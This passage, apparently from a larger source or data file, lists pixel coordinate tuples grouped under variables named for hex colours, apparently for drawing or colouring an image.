(158, 76), (158, 77), (158, 78), (158, 82), (158, 83), (159, 74), (159, 78), (159, 79), (159, 80), (160, 76), (160, 77), ) coordinates_FF00FE = ((124, 94), (124, 96), (124, 97), (124, 98), (124, 99), (124, 100), (124, 101), (124, 102), (124, 103), (124, 104), (124, 106), (125, 94), (125, 107), (126, 95), (126, 97), (126, 98), (126, 99), (126, 100), (126, 101), (126, 103), (126, 104), (126, 106), (126, 111), (127, 95), (127, 97), (127, 98), (127, 99), (127, 100), (127, 101), (127, 105), (127, 107), (127, 109), (127, 113), (127, 114), (127, 115), (127, 116), (127, 117), (127, 118), (127, 120), (128, 96), (128, 98), (128, 99), (128, 101), (128, 106), (128, 108), (128, 111), (128, 112), (128, 113), (128, 114), (128, 122), (129, 97), (129, 100), (129, 107), (129, 110), (129, 115), (129, 118), (129, 119), (129, 120), (129, 124), (130, 100), (130, 107), (130, 108), (130, 117), (130, 121), (130, 122), (130, 123), (130, 126), (130, 127), (130, 129), (131, 98), (131, 100), (131, 118), (131, 120), (131, 125), (131, 129), (132, 99), (132, 126), (132, 128), (133, 126), (133, 128), (134, 126), (134, 128), (135, 126), (135, 129), (136, 126), (136, 129), (137, 125), (137, 127), (137, 128), (137, 130), (138, 125), (138, 127), (138, 128), (138, 130), (139, 126), (139, 128), (139, 130), (140, 127), (140, 130), (141, 129), (142, 128), (143, 127), ) coordinates_FE00FF = ((102, 130), (103, 129), (103, 130), (104, 129), (104, 130), (105, 129), (105, 130), (106, 129), (106, 130), (107, 129), (107, 130), (108, 100), (108, 101), (108, 129), (108, 130), (109, 99), (109, 101), (109, 130), (110, 99), (110, 101), (110, 128), (110, 130), (111, 98), (111, 101), (111, 127), (111, 130), (112, 97), (112, 99), (112, 101), (112, 126), (112, 129), (113, 97), (113, 99), (113, 101), (113, 122), (113, 125), (113, 127), (113, 129), (114, 97), (114, 99), (114, 100), (114, 101), (114, 102), (114, 108), (114, 121), (114, 123), (114, 124), (114, 129), (115, 94), (115, 95), (115, 97), (115, 98), (115, 99), (115, 100), (115, 102), (115, 108), (115, 109), (115, 120), (115, 126), (115, 128), (116, 94), (116, 97), (116, 98), (116, 99), (116, 100), (116, 102), (116, 108), (116, 110), (116, 119), (116, 122), (116, 123), (116, 124), (116, 125), (117, 94), (117, 96), (117, 97), (117, 98), (117, 99), (117, 100), (117, 102), (117, 107), (117, 108), (117, 118), (117, 121), (118, 94), (118, 96), (118, 97), (118, 98), (118, 99), (118, 100), (118, 102), (118, 107), (118, 109), (118, 112), (118, 117), (118, 120), (119, 94), (119, 96), (119, 97), (119, 98), (119, 99), (119, 100), (119, 101), (119, 103), (119, 106), (119, 108), (119, 109), (119, 110), (119, 113), (119, 114), (119, 115), (119, 116), (119, 119), (120, 94), (120, 105), (120, 109), (120, 112), (120, 118), (121, 94), (121, 96), (121, 97), (121, 98), (121, 99), (121, 100), (121, 101), (121, 102), (121, 103), (121, 104), (121, 105), (121, 106), (121, 107), (121, 109), (121, 112), (121, 113), (121, 116), ) coordinates_26408B = ((124, 84), (124, 86), (124, 87), (124, 88), (124, 89), (124, 90), (124, 91), (124, 92), (125, 82), (125, 92), (126, 82), (126, 84), (126, 86), (126, 88), (126, 89), (126, 90), (126, 92), (127, 82), (127, 84), (127, 87), (127, 89), (127, 90), (127, 91), (127, 93), (128, 83), (128, 88), (128, 90), (128, 91), (128, 93), (129, 83), (129, 88), (129, 90), (129, 91), (129, 93), (130, 83), (130, 89), (130, 91), (130, 92), (130, 94), (131, 84), (131, 90), (131, 92), (131, 94), (132, 84), (132, 90), (132, 92), (132, 93), (132, 95), (133, 85), (133, 91), (133, 93), (133, 95), (134, 86), (134, 92), (134, 95), (135, 93), (135, 95), ) coordinates_798732 = ((124, 70), (124, 72), (124, 73), (124, 74), (124, 75), (124, 76), (124, 78), (125, 67), (125, 71), (125, 72), (125, 73), (125, 80), (126, 67), (126, 69), (126, 78), (126, 80), (127, 78), (127, 80), (128, 79), (128, 80), (129, 79), (129, 81), (130, 73), (130, 79), (130, 81), (131, 80), (131, 82), (132, 80), (132, 82), (133, 81), (133, 83), (134, 81), (134, 83), (135, 83), (135, 84), (136, 84), (136, 85), ) coordinates_F5DEB3 = ((86, 72), (87, 70), (87, 74), (88, 72), (88, 75), (88, 91), (88, 92), (89, 69), (89, 71), (89, 80), (89, 81), (89, 82), (89, 83), (89, 84), (89, 85), (89, 86), (89, 87), (89, 88), (89, 89), (89, 90), (89, 92), (90, 68), (90, 70), (90, 72), (90, 76), (90, 78), (90, 92), (91, 68), (91, 71), (91, 79), (91, 80), (91, 81), (91, 82), (91, 83), (91, 84), (91, 92), (92, 67), (92, 70), (92, 85), (92, 86), (92, 87), (92, 88), (92, 89), (92, 91), (93, 67), (93, 69), (94, 67), (94, 68), (94, 69), (94, 70), (94, 71), (94, 75), (95, 66), (95, 68), (95, 69), (95, 70), (95, 71), (95, 72), (95, 73), (95, 76), (96, 67), (96, 69), (96, 70), (96, 71), (96, 73), (96, 74), (96, 75), (96, 78), (97, 67), (97, 69), (97, 70), (97, 71), (97, 72), (97, 73), (97, 74), (97, 75), (97, 76), (97, 79), (98, 67), (98, 69), (98, 70), (98, 71), (98, 72), (98, 73), (98, 74), (98, 75), (98, 76), (98, 77), (98, 78), (98, 81), (99, 67), (99, 69), (99, 70), (99, 71), (99, 72), (99, 73), (99, 79), (99, 82), (100, 67), (100, 69), (100, 70), (100, 71), (100, 72), (100, 73), (100, 74), (100, 75), (100, 76), (100, 77), (100, 78), (100, 84), (101, 67), (101, 69), (101, 70), (101, 71), (101, 73), (101, 79), (101, 80), (101, 81), (101, 82), (101, 84), (102, 68), (102, 70), (102, 71), (102, 73), (103, 69), (103, 71), (103, 73), (104, 70), (104, 75), (104, 76), (104, 78), (105, 71), (105, 73), (105, 74), (105, 75), (105, 76), (105, 77), (105, 79), (106, 80), ) coordinates_016400 = ((132, 131), (132, 132), (133, 130), (133, 133), (134, 131), (134, 134), (135, 131), (135, 133), (135, 135), (136, 131), (136, 132), (136, 136), (137, 132), (137, 137), (138, 132), (138, 135), (138, 138), (139, 132), (139, 136), (139, 139), (140, 132), (140, 137), (140, 139), (141, 132), (141, 137), (141, 139), (142, 131), (142, 132), (142, 136), (142, 138), (143, 130), (143, 131), (143, 135), (143, 137), (144, 129), (144, 130), (144, 135), (144, 137), (145, 134), (145, 136), (146, 133), (146, 135), (147, 132), (147, 134), (148, 132), (148, 134), (149, 132), (149, 134), (150, 132), (150, 134), (151, 132), (151, 134), (152, 132), (152, 134), (153, 132), (153, 134), (154, 133), (154, 134), (155, 134), ) coordinates_B8EDC2 = ((118, 129), (118, 131), (118, 132), (118, 133), (118, 134), (118, 135), (118, 136), (118, 137), (118, 138), (118, 139), (118, 140), (118, 141), (118, 142), (118, 143), (118, 144), (119, 127), (119, 145), (119, 146), (119, 147), (119, 148), (119, 150), (120, 127), (120, 129), (120, 130), (120, 131), (120, 132), (120, 133), (120, 134), (120, 135), (120, 136), (120, 137), (120, 138), (120, 139), (120, 140), (120, 141), (120, 142), (120, 143), (120, 144), (120, 150), (121, 126), (121, 128), (121, 129), (121, 130), (121, 131), (121, 132), (121, 133), (121, 134), (121, 135), (121, 136), (121, 137), (121, 138), (121, 139), (121, 140), (121, 141), (121, 142), (121, 143), (121, 144), (121, 145), (121, 146), (121, 147), (121, 148), (121, 150), (122, 126), (122, 128), (122, 129), (122, 130), (122, 131), (122, 132), (122, 133), (122, 134), (122, 135), (122, 136), (122, 137), (122, 138), (122, 139), (122, 140), (122, 141), (122, 142), (122, 143), (122, 144), (122, 145), (122, 146), (122, 147), (122, 148), (122, 150), (123, 127), (123, 129), (123, 130), (123, 131), (123, 132), (123, 133), (123, 134), (123, 135), (123, 136), (123, 137), (123, 138), (123, 139), (123, 140), (123, 141), (123, 142), (123, 143), (123, 144), (123, 145), (123, 146), (123, 147), (123, 149), (124, 127), (124, 129), (124, 130), (124, 131), (124, 132), (124, 133), (124, 134), (124, 135), (124, 136), (124, 137), (124, 138), (124, 139), (124, 140), (124, 141), (124, 142), (124, 143), (124, 144), (124, 145), (124, 146), (124, 147), (124, 149), (125, 127), (125, 129), (125, 130), (125, 131), (125, 132), (125, 133), (125, 134), (125, 135), (125, 136), (125, 137), (125, 138), (125, 139), (125, 140), (125, 141), (125, 142), (125, 143), (125, 149), (126, 127), (126, 145), (126, 146), (126, 147), (126, 148), (127, 128), (127, 130), (127, 131), (127, 132), (127, 133), (127, 134), (127, 135), (127, 136), (127, 137), (127, 138), (127, 139), (127, 140), (127, 141), (127, 143), ) coordinates_7A8732 = ((110, 82), (111, 81), (111, 82), (112, 68), (112, 69), (112, 70), (112, 71), (112, 72), (112, 80), (113, 66), (113, 68), (113, 74), (113, 76), (113, 77), (113, 78), (113, 81), (114, 65), (114, 67), (114, 75), (114, 79), (114, 81), (115, 64), (115, 67), (115, 76), (115, 78), (116, 63), (116, 66), (116, 67), (116, 68), (117, 62), (117, 63), (117, 66), (117, 68), (117, 69), (117, 70), (117, 71), (117, 73), (118, 62), (118, 66), (118, 70), (118, 74), (119, 63), (119, 70), (119, 72), (119, 74), (120, 65), (120, 68), (120, 75), (121, 68), (121, 69), (121, 70), (121, 71), (121, 72), (121, 74), (122, 72), ) coordinates_CC5B45 = ((151, 96), (152, 96), (153, 96), (154, 93), (154, 96), (155, 92), (155, 94), (155, 95), (156, 91), (156, 92), (157, 90), (158, 88), (158, 89), (159, 86), (159, 88), (160, 87), (161, 85), (161, 86), (161, 92), (161, 94), (161, 105), (161, 107), (161, 108), (161, 110), (162, 85), (162, 90), (162, 95), (162, 106), (162, 109), (163, 82), (163, 84), (163, 89), (163, 93), (163, 95), (163, 106), (163, 109), (164, 80), (164, 83), (164, 88), (164, 91), (164, 94), (164, 95), (164, 107), (164, 109), (165, 79), (165, 82), (165, 87), (165, 89), (165, 93), (165, 96), (166, 79), (166, 82), (166, 85), (166, 88), (166, 94), (166, 96), (167, 79), (167, 81), (167, 82), (167, 83), (167, 84), (167, 87), (167, 94), (167, 96), (168, 80), (168, 81), (168, 82), (168, 83), (168, 86), (168, 95), (168, 96), (169, 80), (169, 82), (169, 83), (169, 84), (169, 86), (169, 95), (169, 96), (170, 81), (170, 83), (170, 85), (171, 81), (171, 84), (172, 82), (172, 83), ) coordinates_27408B = ((107, 98), (108, 87), (108, 96), (108, 98), (109, 85), (109, 87), (109, 95), (109, 97), (110, 85), (110, 87), (110, 94), (110, 96), (111, 84), (111, 86), (111, 91), (111, 92), (111, 96), (112, 84), (112, 86), (112, 90), (112, 95), (113, 83), (113, 85), (113, 89), (113, 91), (113, 92), (113, 94), (114, 83), (114, 85), (114, 88), (114, 90), (114, 91), (114, 93), (115, 83), (115, 85), (115, 88), (115, 90), (115, 92), (116, 83), (116, 85), (116, 88), (116, 89), (116, 91), (117, 83), (117, 85), (117, 88), (117, 89), (117, 91), (118, 84), (118, 87), (118, 88), (118, 89), (118, 91), (119, 84), (119, 86), (119, 87), (119, 88), (119, 89), (119, 91), (120, 84), (120, 91), (121, 85), (121, 87), (121, 88), (121, 89), (121, 91), ) coordinates_006400 = ((90, 135), (91, 135), (92, 135), (93, 134), (93, 135), (94, 134), (94, 135), (95, 134), (95, 135), (96, 135), (97, 133), (97, 135), (98, 133), (98, 135), (99, 133), (99, 136), (100, 133), (100, 136), (101, 134), (101, 137), (102, 134), (102, 136), (102, 139), (103, 132), (103, 134), (103, 135), (103, 136), (103, 137), (103, 140), (104, 132), (104, 134), (104, 135), (104, 136), (104, 137), (104, 139), (105, 132), (105, 134), (105, 135), (105, 136), (105, 138), (106, 132), (106, 134), (106, 135), (106, 136), (106, 138), (107, 132), (107, 134), (107, 135), (107, 137), (108, 132), (108, 134), (108, 136), (109, 132), (109, 135), (110, 132), (110, 134), (111, 132), (111, 133), (112, 132), (113, 131), ) coordinates_E1B7E7 = ((120, 159), (121, 158), (121, 160), (122, 157), (122, 159), (122, 161), (123, 159), (123, 161), (124, 157), (124, 160), (125, 158), (125, 159), )
coordinates_e0_e1_e1 = ((126, 75), (127, 71), (127, 72), (127, 73), (127, 74), (127, 76), (128, 67), (128, 69), (128, 70), (128, 77), (128, 86), (128, 103), (128, 104), (129, 67), (129, 71), (129, 72), (129, 73), (129, 74), (129, 75), (129, 77), (129, 86), (130, 67), (130, 69), (130, 70), (130, 71), (130, 72), (130, 73), (130, 74), (130, 75), (130, 77), (130, 86), (130, 87), (130, 103), (130, 105), (130, 112), (131, 67), (131, 69), (131, 70), (131, 71), (131, 72), (131, 73), (131, 74), (131, 75), (131, 76), (131, 78), (131, 86), (131, 87), (131, 102), (131, 104), (131, 106), (131, 110), (131, 115), (132, 67), (132, 69), (132, 70), (132, 74), (132, 75), (132, 76), (132, 78), (132, 87), (132, 88), (132, 97), (132, 102), (132, 104), (132, 105), (132, 107), (132, 108), (132, 112), (132, 113), (132, 116), (132, 122), (132, 124), (133, 71), (133, 72), (133, 73), (133, 75), (133, 76), (133, 78), (133, 87), (133, 89), (133, 98), (133, 101), (133, 102), (133, 103), (133, 104), (133, 105), (133, 106), (133, 110), (133, 111), (133, 112), (133, 113), (133, 114), (133, 115), (133, 118), (133, 119), (133, 120), (133, 121), (133, 124), (134, 67), (134, 70), (134, 74), (134, 76), (134, 77), (134, 79), (134, 88), (134, 98), (134, 102), (134, 103), (134, 104), (134, 105), (134, 106), (134, 107), (134, 108), (134, 109), (134, 110), (134, 111), (134, 112), (134, 113), (134, 114), (134, 115), (134, 116), (134, 122), (134, 124), (135, 75), (135, 77), (135, 78), (135, 80), (135, 89), (135, 90), (135, 97), (135, 101), (135, 102), (135, 103), (135, 104), (135, 105), (135, 106), (135, 107), (135, 108), (135, 109), (135, 110), (135, 111), (135, 112), (135, 113), (135, 114), (135, 115), (135, 116), (135, 117), (135, 118), (135, 119), (135, 120), (135, 121), (135, 122), (135, 124), (136, 76), (136, 78), (136, 79), (136, 81), (136, 89), (136, 97), (136, 99), (136, 100), (136, 101), (136, 102), (136, 103), (136, 104), (136, 105), (136, 106), (136, 107), (136, 108), (136, 109), (136, 110), (136, 111), (136, 112), (136, 113), (136, 114), (136, 115), (136, 116), (136, 117), (136, 118), (136, 119), (136, 120), (136, 121), (136, 123), (137, 77), (137, 79), (137, 80), (137, 83), (137, 89), (137, 90), (137, 93), (137, 94), (137, 95), (137, 97), (137, 98), (137, 99), (137, 100), (137, 101), (137, 102), (137, 103), (137, 104), (137, 105), (137, 106), (137, 107), (137, 108), (137, 109), (137, 110), (137, 111), (137, 112), (137, 113), (137, 114), (137, 115), (137, 116), (137, 117), (137, 118), (137, 119), (137, 120), (137, 121), (137, 123), (138, 77), (138, 79), (138, 80), (138, 81), (138, 84), (138, 85), (138, 88), (138, 89), (138, 90), (138, 91), (138, 97), (138, 98), (138, 99), (138, 100), (138, 101), (138, 102), (138, 103), (138, 104), (138, 105), (138, 106), (138, 107), (138, 108), (138, 109), (138, 110), (138, 111), (138, 112), (138, 113), (138, 114), (138, 115), (138, 116), (138, 117), (138, 118), (138, 119), (138, 120), (138, 121), (138, 123), (139, 76), (139, 78), (139, 79), (139, 80), (139, 81), (139, 82), (139, 83), (139, 86), (139, 89), (139, 90), (139, 91), (139, 92), (139, 93), (139, 94), (139, 95), (139, 96), (139, 97), (139, 98), (139, 99), (139, 100), (139, 101), (139, 102), (139, 103), (139, 104), (139, 105), (139, 106), (139, 107), (139, 108), (139, 109), (139, 110), (139, 111), (139, 112), (139, 113), (139, 114), (139, 115), (139, 116), (139, 117), (139, 118), (139, 119), (139, 120), (139, 121), (139, 122), (139, 124), (139, 134), (140, 75), (140, 77), (140, 78), (140, 79), (140, 80), (140, 81), (140, 82), (140, 83), (140, 84), (140, 85), (140, 88), (140, 89), (140, 90), (140, 91), (140, 92), (140, 93), (140, 94), (140, 95), (140, 96), (140, 97), (140, 98), (140, 99), (140, 100), (140, 101), (140, 102), (140, 103), (140, 104), (140, 105), (140, 106), (140, 107), (140, 108), (140, 109), (140, 110), (140, 111), (140, 112), (140, 113), (140, 114), (140, 115), (140, 116), (140, 117), (140, 118), (140, 119), (140, 120), (140, 121), (140, 122), (140, 123), (140, 125), (140, 134), (140, 135), (141, 73), (141, 76), (141, 77), (141, 78), (141, 79), (141, 80), (141, 81), (141, 82), (141, 83), (141, 84), (141, 85), (141, 86), (141, 87), (141, 88), (141, 89), (141, 90), (141, 91), (141, 92), (141, 93), (141, 94), (141, 95), (141, 96), (141, 97), (141, 98), (141, 99), (141, 100), (141, 101), (141, 102), (141, 103), (141, 104), (141, 105), (141, 106), (141, 107), (141, 108), (141, 109), (141, 110), (141, 111), (141, 112), (141, 113), (141, 114), (141, 115), (141, 116), (141, 117), (141, 118), (141, 119), (141, 120), (141, 121), (141, 122), (141, 123), (141, 125), (141, 134), (142, 71), (142, 75), (142, 76), (142, 77), (142, 78), (142, 79), (142, 80), (142, 81), (142, 82), (142, 83), (142, 84), (142, 85), (142, 86), (142, 87), (142, 88), (142, 89), (142, 90), (142, 91), (142, 92), (142, 94), (142, 95), (142, 96), (142, 97), (142, 98), (142, 99), (142, 100), (142, 101), (142, 102), (142, 103), (142, 104), (142, 105), (142, 106), (142, 107), (142, 108), (142, 109), (142, 110), (142, 111), (142, 112), (142, 113), (142, 114), (142, 115), (142, 116), (142, 117), (142, 118), (142, 119), (142, 120), (142, 121), (142, 122), (142, 123), (142, 125), (142, 134), (143, 69), (143, 73), (143, 74), (143, 75), (143, 76), (143, 77), (143, 78), (143, 79), (143, 80), (143, 81), (143, 82), (143, 83), (143, 84), (143, 85), (143, 86), (143, 87), (143, 88), (143, 89), (143, 90), (143, 93), (143, 96), (143, 97), (143, 98), (143, 99), (143, 100), (143, 101), (143, 102), (143, 103), (143, 104), (143, 105), (143, 106), (143, 107), (143, 108), (143, 109), (143, 110), (143, 111), (143, 112), (143, 113), (143, 114), (143, 115), (143, 116), (143, 117), (143, 118), (143, 119), (143, 120), (143, 121), (143, 122), (143, 123), (143, 125), (143, 133), (144, 68), (144, 71), (144, 72), (144, 73), (144, 74), (144, 75), (144, 76), (144, 77), (144, 78), (144, 79), (144, 80), (144, 81), (144, 82), (144, 83), (144, 84), (144, 85), (144, 86), (144, 87), (144, 88), (144, 91), (144, 92), (144, 94), (144, 96), (144, 97), (144, 98), (144, 99), (144, 100), (144, 101), (144, 102), (144, 103), (144, 104), (144, 105), (144, 106), (144, 107), (144, 108), (144, 109), (144, 110), (144, 111), (144, 112), (144, 113), (144, 114), (144, 115), (144, 116), (144, 117), (144, 118), (144, 119), (144, 120), (144, 121), (144, 122), (144, 123), (144, 124), (144, 126), (145, 68), (145, 70), (145, 71), (145, 72), (145, 73), (145, 74), (145, 75), (145, 76), (145, 77), (145, 78), (145, 79), (145, 80), (145, 81), (145, 82), (145, 83), (145, 84), (145, 85), (145, 89), (145, 90), (145, 96), (145, 98), (145, 99), (145, 100), (145, 101), (145, 102), (145, 103), (145, 104), (145, 105), (145, 106), (145, 107), (145, 108), (145, 109), (145, 110), (145, 111), (145, 112), (145, 113), (145, 114), (145, 115), (145, 116), (145, 117), (145, 118), (145, 119), (145, 120), (145, 121), (145, 122), (145, 123), (145, 124), (145, 125), (145, 127), (145, 132), (146, 68), (146, 70), (146, 71), (146, 72), (146, 73), (146, 74), (146, 75), (146, 76), (146, 77), (146, 78), (146, 79), (146, 80), (146, 81), (146, 82), (146, 86), (146, 87), (146, 96), (146, 98), (146, 99), (146, 100), (146, 101), (146, 102), (146, 103), (146, 104), (146, 105), (146, 106), (146, 107), (146, 108), (146, 109), (146, 110), (146, 111), (146, 112), (146, 113), (146, 114), (146, 115), (146, 116), (146, 117), (146, 118), (146, 119), (146, 120), (146, 121), (146, 122), (146, 123), (146, 124), (146, 125), (146, 126), (146, 128), (146, 129), (146, 131), (147, 71), (147, 72), (147, 73), (147, 74), (147, 75), (147, 76), (147, 83), (147, 85), (147, 97), (147, 99), (147, 100), (147, 101), (147, 102), (147, 103), (147, 104), (147, 105), (147, 106), (147, 107), (147, 108), (147, 109), (147, 110), (147, 111), (147, 112), (147, 113), (147, 114), (147, 115), (147, 116), (147, 117), (147, 118), (147, 119), (147, 120), (147, 121), (147, 122), (147, 123), (147, 124), (147, 125), (147, 126), (147, 127), (147, 130), (148, 69), (148, 76), (148, 77), (148, 78), (148, 79), (148, 80), (148, 81), (148, 82), (148, 97), (148, 99), (148, 100), (148, 101), (148, 102), (148, 103), (148, 104), (148, 105), (148, 106), (148, 107), (148, 108), (148, 109), (148, 110), (148, 111), (148, 112), (148, 113), (148, 114), (148, 115), (148, 116), (148, 117), (148, 118), (148, 119), (148, 120), (148, 121), (148, 122), (148, 123), (148, 124), (148, 125), (148, 126), (148, 127), (148, 128), (148, 130), (149, 70), (149, 72), (149, 73), (149, 74), (149, 75), (149, 76), (149, 97), (149, 99), (149, 100), (149, 101), (149, 102), (149, 103), (149, 104), (149, 105), (149, 106), (149, 107), (149, 108), (149, 109), (149, 110), (149, 111), (149, 112), (149, 113), (149, 114), (149, 115), (149, 116), (149, 117), (149, 118), (149, 119), (149, 120), (149, 121), (149, 122), (149, 123), (149, 124), (149, 125), (149, 126), (149, 127), (149, 128), (149, 130), (149, 139), (150, 71), (150, 98), (150, 100), (150, 101), (150, 102), (150, 103), (150, 104), (150, 105), (150, 106), (150, 107), (150, 108), (150, 109), (150, 110), (150, 111), (150, 112), (150, 113), (150, 114), (150, 115), (150, 116), (150, 117), (150, 118), (150, 119), (150, 120), (150, 121), (150, 122), (150, 123), (150, 124), (150, 125), (150, 126), (150, 127), (150, 128), (150, 129), (150, 130), (150, 139), (150, 140), (151, 99), (151, 101), (151, 102), (151, 103), (151, 104), (151, 105), (151, 106), (151, 107), (151, 108), (151, 109), (151, 110), (151, 111), (151, 112), (151, 113), (151, 114), (151, 115), (151, 116), (151, 117), (151, 118), (151, 119), (151, 120), (151, 121), (151, 122), (151, 123), (151, 124), (151, 125), (151, 126), (151, 127), (151, 128), (151, 130), (151, 139), (151, 140), (152, 98), (152, 100), (152, 101), (152, 102), (152, 103), (152, 104), (152, 105), (152, 106), (152, 107), (152, 108), (152, 109), (152, 110), (152, 111), (152, 112), (152, 113), (152, 114), (152, 115), (152, 116), (152, 117), (152, 118), (152, 119), (152, 120), (152, 121), (152, 122), (152, 123), (152, 124), (152, 125), (152, 126), (152, 127), (152, 128), (152, 130), (152, 139), (152, 140), (153, 98), (153, 100), (153, 101), (153, 102), (153, 103), (153, 104), (153, 105), (153, 106), (153, 107), (153, 108), (153, 109), (153, 110), (153, 111), (153, 112), (153, 113), (153, 114), (153, 115), (153, 116), (153, 117), (153, 118), (153, 119), (153, 120), (153, 121), (153, 122), (153, 123), (153, 124), (153, 125), (153, 126), (153, 127), (153, 128), (153, 130), (153, 139), (153, 140), (154, 98), (154, 100), (154, 101), (154, 102), (154, 103), (154, 104), (154, 105), (154, 106), (154, 107), (154, 108), (154, 109), (154, 110), (154, 111), (154, 112), (154, 113), (154, 114), (154, 115), (154, 116), (154, 117), (154, 118), (154, 119), (154, 120), (154, 121), (154, 122), (154, 123), (154, 124), (154, 125), (154, 126), (154, 127), (154, 128), (154, 130), (154, 139), (154, 140), (155, 98), (155, 99), (155, 100), (155, 101), (155, 102), (155, 103), (155, 104), (155, 105), (155, 106), (155, 107), (155, 108), (155, 109), (155, 110), (155, 111), (155, 112), (155, 113), (155, 114), (155, 115), (155, 116), (155, 117), (155, 118), (155, 119), (155, 120), (155, 121), (155, 122), (155, 123), (155, 124), (155, 125), (155, 126), (155, 127), (155, 128), (155, 129), (155, 131), (155, 140), (156, 96), (156, 98), (156, 99), (156, 100), (156, 101), (156, 102), (156, 103), (156, 104), (156, 105), (156, 106), (156, 107), (156, 108), (156, 109), (156, 110), (156, 111), (156, 112), (156, 113), (156, 114), (156, 115), (156, 116), (156, 117), (156, 118), (156, 119), (156, 120), (156, 121), (156, 122), (156, 123), (156, 124), (156, 125), (156, 126), (156, 127), (156, 128), (156, 129), (156, 130), (156, 132), (156, 138), (156, 140), (157, 94), (157, 98), (157, 99), (157, 100), (157, 101), (157, 102), (157, 103), (157, 104), (157, 107), (157, 108), (157, 109), (157, 110), (157, 111), (157, 112), (157, 113), (157, 114), (157, 115), (157, 116), (157, 117), (157, 118), (157, 119), (157, 120), (157, 121), (157, 122), (157, 123), (157, 124), (157, 125), (157, 126), (157, 127), (157, 128), (157, 129), (157, 130), (157, 131), (157, 133), (157, 134), (157, 137), (157, 140), (158, 92), (158, 96), (158, 97), (158, 98), (158, 99), (158, 100), (158, 101), (158, 102), (158, 103), (158, 106), (158, 116), (158, 117), (158, 118), (158, 119), (158, 120), (158, 121), (158, 122), (158, 123), (158, 124), (158, 125), (158, 126), (158, 127), (158, 128), (158, 129), (158, 130), (158, 131), (158, 132), (158, 135), (158, 138), (158, 140), (159, 91), (159, 93), (159, 94), (159, 97), (159, 98), (159, 99), (159, 100), (159, 101), (159, 102), (159, 104), (159, 107), (159, 108), (159, 109), (159, 110), (159, 111), (159, 112), (159, 113), (159, 114), (159, 115), (159, 117), (159, 118), (159, 119), (159, 120), (159, 121), (159, 122), (159, 123), (159, 124), (159, 125), (159, 126), (159, 127), (159, 128), (159, 129), (159, 130), (159, 131), (159, 132), (159, 133), (159, 134), (159, 136), (159, 137), (159, 138), (159, 140), (160, 90), (160, 96), (160, 98), (160, 99), (160, 100), (160, 101), (160, 103), (160, 116), (160, 118), (160, 119), (160, 120), (160, 121), (160, 122), (160, 123), (160, 124), (160, 125), (160, 126), (160, 127), (160, 128), (160, 129), (160, 130), (160, 131), (160, 132), (160, 133), (160, 134), (160, 135), (160, 136), (160, 137), (160, 138), (160, 139), (160, 141), (161, 89), (161, 97), (161, 99), (161, 100), (161, 102), (161, 117), (161, 119), (161, 120), (161, 121), (161, 122), (161, 123), (161, 124), (161, 125), (161, 126), (161, 127), (161, 128), (161, 129), (161, 130), (161, 131), (161, 132), (161, 133), (161, 134), (161, 135), (161, 136), (161, 137), (161, 138), (161, 139), (161, 140), (161, 142), (162, 97), (162, 99), (162, 100), (162, 102), (162, 118), (162, 120), (162, 121), (162, 122), (162, 123), (162, 124), (162, 125), (162, 126), (162, 127), (162, 128), (162, 129), (162, 130), (162, 131), (162, 132), (162, 133), (162, 134), (162, 135), (162, 136), (162, 137), (162, 138), (162, 139), (162, 143), (163, 97), (163, 98), (163, 99), (163, 100), (163, 102), (163, 118), (163, 120), (163, 121), (163, 122), (163, 123), (163, 124), (163, 125), (163, 126), (163, 127), (163, 128), (163, 129), (163, 130), (163, 131), (163, 132), (163, 133), (163, 134), (163, 135), (163, 136), (163, 137), (163, 138), (163, 141), (163, 144), (164, 98), (164, 100), (164, 102), (164, 118), (164, 120), (164, 121), (164, 122), (164, 123), (164, 124), (164, 125), (164, 126), (164, 127), (164, 128), (164, 129), (164, 130), (164, 131), (164, 132), (164, 133), (164, 134), (164, 135), (164, 136), (164, 137), (164, 139), (164, 142), (164, 146), (165, 98), (165, 100), (165, 102), (165, 118), (165, 120), (165, 121), (165, 122), (165, 123), (165, 124), (165, 125), (165, 126), (165, 127), (165, 128), (165, 129), (165, 130), (165, 131), (165, 132), (165, 133), (165, 134), (165, 135), (165, 136), (165, 138), (165, 144), (165, 147), (166, 98), (166, 100), (166, 102), (166, 118), (166, 120), (166, 121), (166, 125), (166, 126), (166, 127), (166, 128), (166, 129), (166, 130), (166, 131), (166, 132), (166, 133), (166, 134), (166, 135), (166, 136), (166, 138), (166, 145), (167, 98), (167, 100), (167, 102), (167, 118), (167, 120), (167, 123), (167, 126), (167, 127), (167, 128), (167, 129), (167, 130), (167, 131), (167, 132), (167, 138), (167, 147), (168, 98), (168, 100), (168, 102), (168, 118), (168, 121), (168, 125), (168, 127), (168, 128), (168, 129), (168, 130), (168, 133), (168, 134), (168, 135), (168, 138), (169, 98), (169, 100), (169, 102), (169, 118), (169, 120), (169, 126), (169, 128), (169, 129), (169, 137), (169, 138), (170, 98), (170, 101), (170, 118), (170, 126), (170, 128), (170, 130), (170, 139), (171, 97), (171, 100), (171, 118), (171, 119), (171, 126), (171, 129), (171, 139), (172, 99), (172, 106), (172, 118), (172, 126), (172, 128), (172, 140), (173, 94), (173, 97), (173, 106), (173, 107), (173, 118), (173, 126), (174, 94), (174, 96), (174, 106), (174, 126), (174, 141), (175, 109), (175, 126), (175, 141), (176, 107), (176, 109), (176, 126), (177, 109), (177, 126), (178, 109), (178, 126), (180, 125), (181, 125), (182, 124), (182, 125), (183, 124), (183, 125)) coordinates_e1_e1_e1 = ((63, 130), (63, 131), (64, 116), (64, 118), (64, 120), (64, 130), (65, 104), (65, 106), (65, 108), (65, 115), (65, 120), (65, 130), (66, 103), (66, 115), (66, 117), (66, 118), (66, 120), (66, 130), (67, 103), (67, 105), (67, 106), (67, 107), (67, 109), (67, 114), (67, 116), (67, 120), (67, 130), (68, 102), (68, 104), (68, 105), (68, 106), (68, 107), (68, 109), (68, 115), (68, 119), (68, 120), (68, 130), (68, 142), (69, 95), (69, 102), (69, 104), (69, 105), (69, 106), (69, 107), (69, 108), (69, 109), (69, 111), (69, 112), (69, 115), (69, 119), (69, 130), (69, 141), (69, 144), (70, 96), (70, 102), (70, 104), (70, 105), (70, 106), (70, 107), (70, 108), (70, 109), (70, 114), (70, 115), (70, 119), (70, 141), (70, 144), (71, 96), (71, 97), (71, 102), (71, 104), (71, 105), (71, 106), (71, 107), (71, 108), (71, 109), (71, 110), (71, 111), (71, 112), (71, 113), (71, 114), (71, 115), (71, 118), (71, 119), (71, 140), (71, 143), (72, 97), (72, 99), (72, 100), (72, 101), (72, 102), (72, 103), (72, 104), (72, 105), (72, 106), (72, 107), (72, 108), (72, 109), (72, 110), (72, 111), (72, 112), (72, 113), (72, 115), (72, 118), (72, 119), (72, 